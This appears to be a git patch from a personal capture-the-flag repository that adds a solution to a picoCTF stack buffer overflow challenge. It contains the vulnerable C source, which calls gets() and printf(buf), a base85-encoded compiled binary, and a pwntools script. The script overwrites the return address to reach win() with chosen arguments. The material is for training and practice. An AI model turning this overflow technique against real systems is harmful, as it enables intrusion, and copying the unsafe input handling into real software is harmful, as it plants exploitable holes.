From c56300256d0bcc30547e07d9a1eacf821697461d Mon Sep 17 00:00:00 2001
From: h7x4 <h7x4@nani.wtf>
Date: Tue, 3 Sep 2024 19:46:13 +0200
Subject: [PATCH] pwn/buffer_overflow_2

---
 pwn/buffer_overflow_2/solve.py |  31 ++++++++++++++++++++++++
 pwn/buffer_overflow_2/vuln     | Bin 0 -> 15808 bytes
 pwn/buffer_overflow_2/vuln.c   |  43 +++++++++++++++++++++++++++++++++
 3 files changed, 74 insertions(+)
 create mode 100755 pwn/buffer_overflow_2/solve.py
 create mode 100755 pwn/buffer_overflow_2/vuln
 create mode 100644 pwn/buffer_overflow_2/vuln.c

diff --git a/pwn/buffer_overflow_2/solve.py b/pwn/buffer_overflow_2/solve.py
new file mode 100755
index 0000000..b3dab5e
--- /dev/null
+++ b/pwn/buffer_overflow_2/solve.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -p python3 -i python3 python3Packages.pwntools
+
+from pwn import *
+
+exe = ELF("./vuln")
+
+context.binary = exe
+
+ADDR, PORT, *_ = "saturn.picoctf.net 55214".split()
+
+def conn():
+    if args.REMOTE:
+        r = remote(ADDR, PORT)
+    else:
+        r = process([exe.path])
+
+    return r
+
+def main():
+  r = conn()
+
+  print(r.recvuntil(b"Please enter your string:"))
+  offset = 112 # found with pwndbg
+  payload = b'A' * offset + p32(exe.sym.win) + b'B'*4 + p32(0xCAFEF00D) + p32(0xF00DF00D)
+  r.sendline(payload)
+  print(r.recvall())
+  r.close()
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/pwn/buffer_overflow_2/vuln b/pwn/buffer_overflow_2/vuln
new file mode 100755
index 0000000000000000000000000000000000000000..accb967c62baf9a39e56548a7ce13c01279497fa
GIT binary patch
literal 15808
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
Dvc+&Y

literal 0
HcmV?d00001

diff --git a/pwn/buffer_overflow_2/vuln.c b/pwn/buffer_overflow_2/vuln.c
new file mode 100644
index 0000000..60b8d31
--- /dev/null
+++ b/pwn/buffer_overflow_2/vuln.c
@@ -0,0 +1,43 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+
+#define BUFSIZE 100
+#define FLAGSIZE 64
+
+void win(unsigned int arg1, unsigned int arg2) {
+  char buf[FLAGSIZE];
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'flag.txt' in this directory with your",
+                    "own debugging flag.\n");
+    exit(0);
+  }
+
+  fgets(buf,FLAGSIZE,f);
+  if (arg1 != 0xCAFEF00D)
+    return;
+  if (arg2 != 0xF00DF00D)
+    return;
+  printf(buf);
+}
+
+void vuln(){
+  char buf[BUFSIZE];
+  gets(buf);
+  puts(buf);
+}
+
+int main(int argc, char **argv){
+  setvbuf(stdout, NULL, _IONBF, 0);
+
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+
+  puts("Please enter your string: ");
+  vuln();
+  return 0;
+}
+